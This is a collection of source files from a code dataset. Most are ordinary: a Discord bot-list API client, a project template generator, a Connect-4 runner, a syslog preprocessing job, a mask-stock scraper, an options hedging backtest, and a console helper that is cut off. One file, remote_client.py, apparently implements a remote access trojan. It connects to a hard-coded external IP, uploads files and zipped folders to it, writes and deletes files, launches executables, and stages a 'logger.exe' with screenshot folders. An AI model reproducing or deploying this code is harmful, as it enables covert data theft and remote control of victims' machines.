+{"seq_id":"616429510","text":"import asyncio\nimport aiohttp\nfrom discord.ext.commands import Bot\nclass API:\n def __init__(self, bot: Bot, token):\n self.bot = bot\n self.token = token\n self.stats_url = \"https://discordbots.org/api/bots/\" + str(bot.user.id) + \"/stats\"\n self.check_url = f\"https://discordbots.org/api/bots/{str(bot.user.id)}/check\"\n self.votes_url = f'https://discordbots.org/api/bots/{str(bot.user.id)}/votes'\n self.session = aiohttp.ClientSession()\n self.header = {\"Authorization\" : self.token}\n async def post_guilds(self):\n data = {'server_count': len(self.bot.guilds)}\n async with aiohttp.ClientSession() as client:\n await client.post(self.stats_url, data=data, headers=self.header)\n print('Server count posted')\n\n async def user_voted(self, userid: int):\n # open a short-lived session so both the response and the session are closed cleanly\n async with aiohttp.ClientSession() as client:\n async with client.get(self.check_url + f'?userId={userid}', headers=self.header) as res:\n r = await res.json()\n if r['voted'] == 0:\n return False\n else:\n return True\n\n async def get_last_1000_votes(self) -> list:\n async with aiohttp.ClientSession() as client:\n async with client.get(self.votes_url, headers=self.header) as res:\n r = await res.json()\n\n return r\n\n\n\n\n\n\n","sub_path":"utils/DiscordBotListAPI.py","file_name":"DiscordBotListAPI.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"226353299","text":"import os\nimport jinja2\nimport shutil\nimport yaml\n\nCMAKELISTS_FILENAME = \"CMakeLists.txt.template\"\nCONFIG_FILENAME = \"tudat-space.yml.template\"\nMAIN_PY_FILENAME = \"main.py.template\"\nKERNEL_FILENAME = \"kernel.cpp.template\"\nMAIN_CPP_FILENAME = \"main.cpp.template\"\n\n\ndef yaml2dict(path):\n with open(path) as file:\n dict_ = yaml.load(file, Loader=yaml.FullLoader)\n return dict_\n\n\ndef render_templates(templates, path, **template_kwargs):\n for template in templates:\n file_path = template.filename.replace(\".template\", \"\")\n file_name = os.path.split(file_path)[-1]\n with open(os.path.join(path, file_name), \"w\") as f:\n f.write(template.render(template_kwargs))\n\n\ndef create_project(project_name,\n project_type,\n project_path=\".\",\n template_path=\"./templates\",\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n project_name: str\n project_type: str {\"hybrid\", \"cpp\", \"python\"}\n project_git: str [optional]\n\n Returns\n -------\n\n \"\"\"\n\n support_folder = kwargs.get(\"support_folder\", \"support\")\n kernel_folder = kwargs.get(\"kernel_folder\", \"kernel\")\n\n template_loader = jinja2.FileSystemLoader(searchpath=template_path)\n template_env = jinja2.Environment(loader=template_loader)\n\n abs_path_project = os.path.join(project_path, project_name)\n abs_path_kernel = os.path.join(abs_path_project, kernel_folder)\n abs_support_path = os.path.join(abs_path_project, support_folder)\n\n os.makedirs(abs_path_project)\n os.makedirs(abs_support_path)\n\n kernel_templates = []\n support_templates = []\n root_templates = []\n\n config_template = template_env.get_template(CONFIG_FILENAME)\n root_templates.append(config_template)\n\n if 
(project_type == \"hybrid\") | (project_type == \"python\"):\n main_py_template = template_env.get_template(MAIN_PY_FILENAME)\n root_templates.append(main_py_template)\n\n if (project_type == \"hybrid\") | (project_type == \"cpp\"):\n cmakelists_template = template_env.get_template(CMAKELISTS_FILENAME)\n root_templates.append(cmakelists_template)\n\n if project_type == \"hybrid\":\n os.makedirs(abs_path_kernel)\n kernel_cpp_template = template_env.get_template(KERNEL_FILENAME)\n kernel_templates.append(kernel_cpp_template)\n\n elif project_type == \"cpp\":\n main_cpp_template = template_env.get_template(MAIN_CPP_FILENAME)\n root_templates.append(main_cpp_template)\n\n elif project_type == \"python\":\n pass\n # main_py_template = template_env.get_template(\"main.py.template\")\n # root_templates.append(main_py_template)\n\n template_kwargs = {\"project_name\": project_name,\n \"project_type\": project_type,\n **kwargs}\n\n render_templates(root_templates, abs_path_project, **template_kwargs)\n render_templates(kernel_templates, abs_path_kernel, **template_kwargs)\n render_templates(support_templates, abs_support_path, **template_kwargs)\n\n\ndef test():\n try:\n create_project(\n project_name=\"test_hybrid\",\n project_type=\"hybrid\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n create_project(\n project_name=\"test_cpp\",\n project_type=\"cpp\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n create_project(\n project_name=\"test_python\",\n project_type=\"python\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n except FileExistsError:\n shutil.rmtree(\"./test_space\")\n finally:\n pass\n\n\ndef main(\n project_name,\n project_type=\"python\",\n project_path=\".\",\n project_config_directory=None\n):\n kwargs = yaml2dict(\"config/base.yml\")\n if project_config_directory:\n kwargs.update(yaml2dict(project_config_directory))\n create_project(\n project_name=project_name,\n project_type=project_type,\n project_path=project_path,\n **kwargs\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\n description=(\"Configure a project given a conda-forge.yml file.\")\n )\n parser.add_argument(\n \"project_name\",\n help=(\n \"the name of the project that is to be created\"\n ),\n )\n args = parser.parse_args()\n main(args.project_name)\n","sub_path":"tudatpy/cli/create_project2.py","file_name":"create_project2.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565756194","text":"# Create a program that asks the user to enter their name and their age. Print out a message addressed to them that tells them the year that they will turn 100 years old.\n# Extras:\n#\n# Add on to the previous program by asking the user for another number and printing out that many copies of the previous message. (Hint: order of operations exists in Python)\n# Print out that many copies of the previous message on separate lines. 
(Hint: the string \"\\n\" is the same as pressing the ENTER button)\nfrom datetime import datetime\n\n\ndef main():\n nome = input(\"Enter your name: \")\n idade = int(input(\"How old are you?\"))\n calcula_aos_100(nome, idade)\n\n\ndef calcula_aos_100(nome, idade):\n ano_atual = int(datetime.today().strftime(\"%Y\"))\n quantas_mensagens = int(input(\"Display how many times?\"))\n for x in range(quantas_mensagens):\n if idade < 100:\n print(f'{nome}, you will turn 100 years old in {str(ano_atual + (100 - idade))}')\n elif idade == 100:\n print(f'It is {str(ano_atual)}, and {nome} is 100 years old.')\n else:\n print(\"You are too old to run this program.\")\n\n\nif __name__ == '__main__': main()\n","sub_path":"01 Character Input/character_input.py","file_name":"character_input.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"5786069","text":"#!/usr/bin/python3\n\nfrom engine_connect4 import EngineConnect4\nfrom board_state import BoardState\n\ndef main():\n colour_player = 1\n colour_engine = 2\n board = BoardState()\n depth = 6\n engine = EngineConnect4(board, colour_engine, colour_player, depth, go_first=True)\n winner = 0\n while winner == 0 and len(board.valid_moves()) > 0:\n move_col = None\n while move_col not in board.valid_moves():\n move_col = int(input('Your move: '))\n engine.record_move(colour_player, move_col)\n winner = board.winner()\n if winner != 0:\n break\n print('Engine\\'s move...')\n engine.make_move()\n winner = board.winner()\n print('Player {} wins!'.format(winner))\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"629234546","text":"from typing import Callable, Any, TypeVar\nimport src.utils.datastructures.node_heap as nh\nT = TypeVar('T')\n\ndef comp_wrapper(func: Callable[[T, Any], bool]) -> Callable[[T, Any], bool]:\n def comp_func(self, other):\n if not isinstance(other, nh.HeapNode):\n raise TypeError(f\"other must be of type HeapNode but got {type(other)}\")\n elif other.key != self.key:\n raise ValueError(\n \"Comparison node does not have the correct key \" +\n f\"expected HeapNode with key {self.key} but got {other}\"\n )\n return func(self, other) \n return comp_func\n\n\n\"\"\"\nThese two implementations are equivalent\n\nclass SomeClass:\n @comp_wrapper\n def __eq__(self, other):\n #Some comp\n return comp\n\nclass SomeClass:\n def __init__(self):\n self.__eq__ = comp_wrapper(self.__eq__)\n \n def __eq__(self, other):\n #Some comp\n return comp\n\"\"\"","sub_path":"app/src/utils/boilerplate_decorators/comparitor_decorators.py","file_name":"comparitor_decorators.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"387928703","text":"from message import Message, Header, Command\nfrom client import Client\nfrom psutil import process_iter\nfrom shutil import rmtree\nfrom time import sleep\nfrom sys import exit\nimport zipfile\nfrom datetime import datetime\nimport os\n\nFOLDER_PATH = r\"C:\\Users\\Public\\Documents\\data\"\nSS_PATH = r\"C:\\Users\\Public\\Documents\\data\\ss\"\nLOG_PATH = r\"C:\\Users\\Public\\Documents\\data\\logs\"\nLOGGER_PATH = r\"C:\\Users\\Public\\Documents\\data\\logger.exe\"\nCONF_PATH = r\"C:\\Users\\Public\\Documents\\data\\conf\"\n\n_client = None\n\nif not 
os.path.exists(FOLDER_PATH):\n os.makedirs(FOLDER_PATH)\nif not os.path.exists(SS_PATH):\n os.makedirs(SS_PATH)\nif not os.path.exists(LOG_PATH):\n os.makedirs(LOG_PATH)\n\n\ndef connection_with_server(_client):\n while True:\n try:\n # Try to send message from queue\n if len(_client.queue_send) > 0:\n _client.log('Sending command to server...')\n msg = _client.queue_send.pop(0)\n _client.send_message(msg)\n\n # Try to process message from queue\n if len(_client.queue_receive) > 0:\n msg = _client.queue_receive.pop(0)\n\n if msg.header == Header.IDLE:\n _client.log('Local Client not connected!')\n\n if msg.header == Header.EXIT:\n exit()\n\n if msg.header == Header.COMMAND:\n _client.log('New command received!')\n result_msg = _execute_command(msg)\n _client.queue_send.append(result_msg)\n\n except ConnectionError:\n _client.connected_to_server = False\n _client.log('Connection with server failed!')\n\n sleep(0.5)\n\n\ndef _execute_command(msg):\n if msg.command == Command.LS:\n msg = command_ls(msg)\n elif msg.command == Command.LS_TREE:\n msg = command_ls_tree(msg)\n elif msg.command == Command.CREATE_FOLDER:\n msg = command_crete_folder(msg)\n elif msg.command == Command.UPLOAD_FILE:\n msg = command_upload_file(msg)\n elif msg.command == Command.DOWNLOAD_FILE:\n msg = command_download_file(msg)\n elif msg.command == Command.UPLOAD_FOLDER:\n msg = command_upload_folder(msg)\n elif msg.command == Command.REMOVE_FILE:\n msg = command_remove_file(msg)\n elif msg.command == Command.REMOVE_FOLDER:\n msg = command_remove_folder(msg)\n elif msg.command == Command.UPDATE_CONFIG:\n msg = command_update_config(msg)\n elif msg.command == Command.START_EXE:\n msg = command_start_exe(msg)\n elif msg.command == Command.CHECK_PROCESS_RUNNING:\n msg = command_check_process_running(msg)\n else:\n msg = Message(Header.RESPONSE, Command.COMMAND_NOT_KNOWN)\n\n return msg\n\n\n# region COMMANDS\ndef zipdir(str_path):\n zipf = zipfile.ZipFile(f'{FOLDER_PATH}/zipped', 'w', zipfile.ZIP_DEFLATED)\n base_name = os.path.basename(str_path)\n for root, dirs, files in os.walk(str_path):\n for file in files:\n zipf.write(os.path.join(root, file), f'{base_name}\\\\{file}')\n zipf.close()\n\n\ndef get_path(path):\n path = str(path)\n path = path.replace('_data_', FOLDER_PATH)\n path = path.replace('_logs_', LOG_PATH)\n path = path.replace('_ss_', SS_PATH)\n path = path.replace('_logger_', LOGGER_PATH)\n path = path.replace('_user_', os.getlogin())\n\n return path\n\n\ndef command_ls(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.LS)\n\n result = ''\n try:\n entries = os.scandir(path)\n for entry in entries:\n result += f'{entry.name}{\"\" if entry.is_file() else \"/\"} - {os.path.getsize(path + os.sep + entry.name) / 1024:.2f} Kb\\n'\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_ls_tree(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.LS_TREE)\n\n result = ''\n try:\n for root, dirs, files in os.walk(path):\n level = root.replace(path, '').count(os.sep)\n indent = ' ' * 4 * level\n result += '{}{}/\\n'.format(indent, os.path.basename(root))\n subindent = ' ' * 4 * (level + 1)\n for f in sorted(files, key=lambda f: os.path.getsize(root + os.sep + f)):\n result += f'{subindent}{f} - {(os.path.getsize(root + os.sep + f)/1024.)/1024.:.2f}MB\\n'\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_crete_folder(msg):\n path = get_path(msg.payload)\n\n msg = 
Message(Header.RESPONSE, Command.CREATE_FOLDER)\n\n try:\n os.makedirs(path)\n msg.payload = 'succesful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_upload_file(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.UPLOAD_FILE)\n\n try:\n with open(path, 'rb') as file:\n result = (os.path.basename(path), file.read())\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_upload_folder(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.UPLOAD_FOLDER)\n\n try:\n zipdir(path)\n with open(f'{FOLDER_PATH}\\\\zipped', 'rb') as file:\n result = (os.path.basename(path), file.read())\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_download_file(msg):\n path = get_path(msg.payload[0])\n\n data = msg.payload[1]\n\n msg = Message(Header.RESPONSE, Command.DOWNLOAD_FILE)\n msg.payload = 'Success'\n\n try:\n with open(path, 'wb') as file:\n file.write(data)\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_remove_file(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.REMOVE_FILE)\n\n try:\n os.remove(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_remove_folder(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.REMOVE_FOLDER)\n\n try:\n rmtree(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_update_config(msg):\n parameter = msg.payload\n\n msg = Message(Header.RESPONSE, Command.UPDATE_CONFIG)\n\n try:\n conf = None\n with open(CONF_PATH, 'r') as conf_file:\n conf = eval(conf_file.read())\n if parameter[0] in conf:\n conf[parameter[0]] = parameter[1]\n\n with open(CONF_PATH, 'w') as conf_file:\n conf_file.write(str(conf))\n\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_start_exe(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.START_EXE)\n\n try:\n os.startfile(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_check_process_running(msg):\n process_name = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.CHECK_PROCESS_RUNNING)\n\n msg.payload = f'Process with name \"{process_name}\" not found.'\n\n for proc in process_iter():\n try:\n # Check if process name contains the given name string.\n if process_name.lower() in proc.name().lower():\n msg.payload = f'Process with name \"{process_name}\" is running.'\n except Exception as e:\n msg.payload = e\n\n return msg\n# endregion\n\n\ndef get_time_label():\n return datetime.today().strftime('______%d-%m-%Y______%H:%M:%S______')\n\n\ndef write_exception_log(str_message):\n with open(f\"{LOG_PATH}\\\\log\", \"a+\", encoding='utf-8') as f:\n f.write(str_message)\n\n\ndef load_conf():\n try:\n with open(CONF_PATH, 'r') as conf_file:\n conf = eval(conf_file.read())\n autostart_list = conf['autostart']\n\n for asp in autostart_list:\n command_start_exe(Message(Header.COMMAND, payload=asp))\n\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')\n\n\nif __name__ == \"__main__\":\n try:\n load_conf()\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')\n\n try:\n # _client = Client('Remote Client', '127.0.0.1', 55555)\n _client = Client('Remote 
Client', '34.197.214.35', 55555)\n connection_with_server(_client)\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')","sub_path":"remote_client.py","file_name":"remote_client.py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79666425","text":"from pricing_options.Options import OptionBarrierEuropean,OptionPlainEuropean,OptionPlainAmerican\nfrom pricing_options.Evaluation import Evaluation\nfrom pricing_options.SviPricingModel import SviPricingModel\nfrom pricing_options.SviVolSurface import SviVolSurface\nimport exotic_options.exotic_option_utilities as exotic_util\nimport Utilities.svi_prepare_vol_data as svi_data\nfrom bs_model import bs_estimate_vol as bs_vol\nfrom Utilities.utilities import *\nimport Utilities.hedging_utility as hedge_util\nimport os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Utilities.plot_util as pu\nimport math\nimport pandas as pd\n\ndef calculate_hist_vol(evalDate,calendar,underlyings):\n #start = calendar.advance(evalDate,ql.Period(-1,ql.Months))\n #start = calendar.advance(evalDate, ql.Period(-1, ql.Weeks))\n start = calendar.advance(evalDate, ql.Period(-4, ql.Days))\n #print(start,evalDate)\n yields = []\n while start < evalDate:\n price = underlyings.get(to_dt_date(start))\n t_1 = calendar.advance(start,ql.Period(1,ql.Days))\n price1 = underlyings.get(to_dt_date(t_1))\n r = (price-price1)/price1\n yields.append(r)\n start = calendar.advance(start,ql.Period(1,ql.Days))\n hist_vol = np.std(yields)*np.sqrt(252)\n #print(hist_vol)\n return hist_vol\n\n\n\nwith open(os.path.abspath('..')+'/intermediate_data/spotclose_m.pickle','rb') as f:\n underlyings = pickle.load(f)[0]\n\n# Evaluation Settings\nbegDate = ql.Date(27, 7, 2017)\nendDate = ql.Date(28, 8, 2017)\nmaturitydt = endDate\n\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\n#begDate = calendar.advance(begDate,ql.Period(1,ql.Days))\n\nfee = 0.2/1000\ndt = 1.0/365\nrf = 0.03\noptionType = ql.Option.Call\n\n##############################################################################\nresults = {}\nfor strike in [2575,2675,2775,2875,2975]:\n print('strike = ',strike)\n\n euro_option = OptionPlainEuropean(strike,maturitydt,optionType)\n ame_option = OptionPlainAmerican(strike,begDate, maturitydt, optionType)\n optionql = euro_option.option_ql\n\n S0 = underlyings.get(to_dt_date(begDate))\n underlying = ql.SimpleQuote(S0)\n\n eval_dates = []\n cont_dholding_bs = []\n cont_delta_bs = []\n cont_tradingcost_bs = []\n cont_hedgeerror_bs = []\n cont_replicate_bs = []\n cont_optionprice_bs = []\n cont_spot = []\n cont_pnl_bs = []\n cont_cash_bs = []\n # Calibration\n evalDate = begDate\n\n spot = S0\n underlying.setValue(spot)\n\n # Contract Hedge Portfolio\n evalDate = calendar.advance(evalDate,ql.Period(1,ql.Days))\n evaluation = Evaluation(evalDate, daycounter, calendar)\n const_vol = calculate_hist_vol(evalDate,calendar,underlyings)\n process_bs = evaluation.get_bsmprocess_cnstvol(daycounter, calendar, underlying, const_vol)\n engine_bs = ql.BinomialVanillaEngine(process_bs, 'crr', 801)\n optionql.setPricingEngine(engine_bs)\n price_bs = optionql.NPV()\n delta_bs = optionql.delta()\n\n tradingcost_bs = delta_bs*spot*fee\n cash_bs = price_bs - delta_bs*spot - tradingcost_bs\n\n replicate_bs = delta_bs*spot + cash_bs\n\n cont_delta_bs.append(delta_bs)\n cont_dholding_bs.append(delta_bs)\n cont_tradingcost_bs.append(tradingcost_bs)\n 
cont_replicate_bs.append(replicate_bs)\n cont_optionprice_bs.append(price_bs)\n cont_hedgeerror_bs.append(0.0)\n cont_pnl_bs.append(0.0)\n eval_dates.append(to_dt_date(evalDate))\n cont_cash_bs.append(cash_bs)\n cont_spot.append(spot)\n\n last_delta_bs = delta_bs\n last_price_bs = price_bs\n last_pnl_svi = 0.0\n last_pnl_bs = 0.0\n last_spot = spot\n\n while evalDate < endDate:\n evalDate = calendar.advance(evalDate, ql.Period(1, ql.Days))\n eval_dates.append(to_dt_date(evalDate))\n evaluation = Evaluation(evalDate, daycounter, calendar)\n spot = underlyings.get(to_dt_date(evalDate))\n underlying.setValue(spot)\n const_vol = calculate_hist_vol(evalDate, calendar, underlyings)\n process_bs = evaluation.get_bsmprocess_cnstvol(daycounter, calendar, underlying, const_vol)\n engine_bs = ql.BinomialVanillaEngine(process_bs, 'crr', 801)\n\n\n #try:\n if evalDate == endDate:\n price_svi = price_bs = max(0.0,spot-strike)\n delta_svi = delta_bs = 0.0\n else:\n optionql.setPricingEngine(engine_bs)\n price_bs = optionql.NPV()\n delta_bs = optionql.delta()\n\n\n cash_bs = cash_bs*math.exp(rf * dt)\n # compute the hedging error\n replicate_bs = last_delta_bs*spot + cash_bs\n\n pnl_bs = replicate_bs - price_bs\n hedgeerror_bs2 = pnl_bs - last_pnl_bs\n\n last_pnl_bs = pnl_bs\n # rebalance the position\n dholding_bs = delta_bs - last_delta_bs\n tradingcost_bs = dholding_bs*spot*fee\n\n cash_bs = cash_bs - dholding_bs*spot - tradingcost_bs\n replicate_bs = delta_bs*spot + cash_bs\n\n last_delta_bs = delta_bs\n\n\n cont_delta_bs.append(delta_bs)\n cont_dholding_bs.append(dholding_bs)\n cont_replicate_bs.append(replicate_bs)\n cont_hedgeerror_bs.append(hedgeerror_bs2)\n cont_tradingcost_bs.append(tradingcost_bs)\n cont_optionprice_bs.append(price_bs)\n cont_pnl_bs.append(pnl_bs)\n\n\n cont_cash_bs.append(cash_bs)\n cont_spot.append(spot)\n #last_spot = spot\n #underlyings, black_var_surface, const_vol = get_vol_data(evalDate, daycounter, calendar, contractType)\n #spot = underlyings.get(spot_maturity)\n\n #underlying.setValue(spot)\n #cont_spot.append(spot)\n #print('strike = ',strike)\n #print('cash_bs = ',cash_bs)\n #print('price_svi = ', price_svi)\n #print('price_bs = ',price_bs)\n #print('delta_bs = ',delta_bs)\n print(\"=\" * 120)\n\n\n\n\n\n results.update({str(strike):cont_pnl_bs})\n results.update({str(strike) + ' option price bs': cont_optionprice_bs})\n results.update({'K=' + str(strike) : np.divide(cont_pnl_bs, cont_optionprice_bs[0])})\n\n print(\"%15s %15s %15s %15s %15s %15s %15s \" % (\"evalDate\",\"close\",\"hedgeerror_bs\",\n \"delta_bs\",\n \"optionprice\",\n \"pnl_bs\",\"\"))\n print(\"-\" * 120)\n for idx,s in enumerate(cont_spot):\n print(\"%15s %15s %15s %15s %15s %15s %15s\" % (eval_dates[idx],round(s,4),\n\n round(cont_hedgeerror_bs[idx],4),\n\n round(cont_delta_bs[idx],4),\n round(cont_optionprice_bs[idx],4),\n\n round(cont_pnl_bs[idx], 4),\n ''))\n print(\"-\" * 120)\n print(cont_pnl_bs[-1]/cont_optionprice_bs[0])\n print(\"=\" * 120)\nresults.update({'eval_dates': eval_dates})\nresults.update({'underlying': cont_spot})\ndf = pd.DataFrame(data=results)\ndf.to_csv('m2 dailyhedge_european.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dynamic_hedge/delta_hedge_rebalancing_m_histvol.py","file_name":"delta_hedge_rebalancing_m_histvol.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"112286018","text":"PALADINS_URL = 'http://api.paladins.com/paladinsapi.svc'\nJSON = 'Json'\n\nLANGUAGES = {\n 'ENGLISH': '1',\n 'GERMAN': 
'2',\n 'FRENCH': '3',\n 'SPANISH': '7',\n 'SPANISHLA': '9',\n 'PORTUGUESE': '10',\n 'RUSSIAN': '11',\n 'POLISH': '12',\n 'TURKISH': '13'}\n\nENGLISH = LANGUAGES['ENGLISH']\n\n\nNUMBER_OF_BANS = 4","sub_path":"src/paladins_api/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"313663002","text":"import pandas as pd\nimport os\nimport sys\nimport datetime\nimport numpy as np\nimport traceback\nfrom hdfs import InsecureClient\nfrom pyspark.ml.linalg import VectorUDT\nfrom pyspark.sql.functions import udf\nfrom dependencies.spark import Spark\nfrom dependencies.utils import *\nfrom pyspark.ml.feature import CountVectorizer, StopWordsRemover\n\ntry:\n '''\n Connect to ES and Spark\n '''\n config = ConfigParser()\n config.read('config.ini')\n spark = Spark(config, app_name='jhkim_job')\n spark_sess = spark.spark_session\n reader = spark.es_reader\n reader = reader.option(\"es.read.field.exclude\", \"host.ip, host.mac\")\n spark_sess.conf.set(\"spark.sql.execution.arrow.pyspark.enabled\", \"true\")\n\nexcept Exception as ex:\n print('spark_session connection failed: ', ex)\n\n\ndef retrieve_data_from_es():\n '''\n Store the data loaded from ES as a dataframe, then vectorize it to build the final input for preprocessing.\n Save the resulting preprocessed data to HDFS.\n '''\n try:\n now = datetime.datetime.now() # limits the data volume for migration\n date = now.strftime('%Y.%m.%d')\n df_syslog = reader.load(\"sym-log-syslog-{}\".format(date))\n df_syslog.printSchema()\n except Exception as ex:\n traceback.print_exc()\n\n try:\n df_syslog = df_syslog.select(F.col('@timestamp').alias('timestamp'),\n F.col(\"host.hostname\").alias('hostname'),\n F.col('host.id').alias('id'),\n F.col('log.file.path').alias('path'),\n F.col('message').alias('message'),\n F.col('pid').alias('pid'),\n F.col('program').alias('program'))\n\n # filter out beats-related logs (to be handled in logstash later)\n df_syslog = df_syslog.filter(\n (F.col('program') != 'filebeat') & (F.col('program') != 'metricbeat'))\n\n df_syslog.withColumn('word', F.explode(F.split(F.col('message'), ' '))) \\\n .groupBy('word') \\\n .count() \\\n .sort('count', ascending=False)\n\n df_syslog = df_syslog.withColumn('word_array', F.split(F.col('message'), ' '))\n\n # stopword remove\n remover = StopWordsRemover(inputCol=\"word_array\", outputCol=\"word_array_f1\")\n df_syslog = remover.transform(df_syslog)\n cv = CountVectorizer(inputCol='word_array_f1', outputCol='sparse_features',\n vocabSize=500, minDF=3)\n model = cv.fit(df_syslog)\n result = model.transform(df_syslog).fillna(0)\n\n except Exception as ex:\n print('Data load failed: ', ex)\n\nif __name__ == '__main__':\n retrieve_data_from_es()\n","sub_path":"pre-processing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"48879678","text":"#%%\n\n\nfrom datetime import datetime #scheduling job\n\nfrom apscheduler.schedulers.background import BackgroundScheduler \n\nimport importlib\nimport time\n\nimport requests\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\n\n\n\n\n#Printing all commands\n# from IPython.core.interactiveshell import InteractiveShell\n# InteractiveShell.ast_node_interactivity = \"all\"\n\n#%%\n\noptions = webdriver.ChromeOptions()\n\n# hide the browser window\noptions.add_argument(\"headless\")\nbrowser = webdriver.Chrome(chrome_options=options)\n#browser = webdriver.Chrome()\n\n# %%\n\n# Number of loops\nn = 150\n\n\nurl0 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=1007236&xcode=028&mcode=001&scode=&type=X&sort=regdate&cur_code=028&GfDT=aWV8\" # droplet-blocking\nurl1 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=920693&xcode=023&mcode=001&scode=&type=X&sort=manual&cur_code=023001&GfDT=bm14W1w%3D\" # premium\nurl2 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=997647&xcode=023&mcode=002&scode=&special=1&GfDT=bmx7W1w%3D\" # regular\n\n# for error testing\n# Server_unavailable_test = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=920693&xcode=023&mcode=001&scode=&type=X&sort=manual&cur_code=023&GfDT=bm18W1U%3D\"\n\n# for stock testing\n# url2 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=510581&xcode=026&mcode=001&scode=&type=X&sort=manual&cur_code=026&GfDT=aGt3UA%3D%3D\"\n\npages = [url0, url1, url2]\nstatus = \"SOLD OUT\"\n\nwhile n >= 1:\n for i in pages:\n browser.get(i)\n try:\n element = WebDriverWait(browser, 10).until(EC.visibility_of_element_located((By.CLASS_NAME, \"prd-btns\")))\n elem1 = browser.find_element_by_class_name(\"prd-btns\")\n status = elem1.text\n print (\"connected url\", pages.index(i))\n except (NoSuchElementException, TimeoutException, StaleElementReferenceException):\n print (\"not connected url\", pages.index(i))\n pass\n finally:\n if status == \"SOLD OUT\":\n pass\n else:\n import preproc_wellkeeps\n #importlib.reload(preproc_wellkeeps)\n n = 0\n break\n \n n -= 1\n \n print (\"out of stock \\n attempts left: \", n, datetime.now())\n time.sleep(3)\n\nelse:\n print (\" job finished\")\n\n\n# %%\n","sub_path":"웰킵스/prod_wellkeeps.py","file_name":"prod_wellkeeps.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"323210509","text":"\"\"\"Should be added to the environment variable PYTHONSTARTUP so it runs at the beginning of every Python console\"\"\"\nimport os, socket\nimport threading\nfrom time import sleep\nfrom difflib import SequenceMatcher\n\ndef similar(a, b):\n subst = a.lower() in b.lower() or b.lower() in a.lower() # One string in the other weighs more than stringmatching\n ratio = SequenceMatcher(None, a, b).ratio()\n return ratio * (subst + 0.5), a, b\n\nclass newput():\n def __init__(self, file):\n self.file = open(file)\n def readline(self):\n return self.file.readline().rstrip()\n\ndef listinput(file=None):\n \"\"\"Generate list from every line of input until KeyboardInterrupt, SystemExit, EOFError\"\"\"\n _input = newput(file).readline if file is not None and os.path.isfile(file) else input\n l = []\n last = ''\n while True:\n try:\n data = _input()\n if data == '' and last == '':\n break\n elif data != '':\n l.append(data)\n last = data\n except 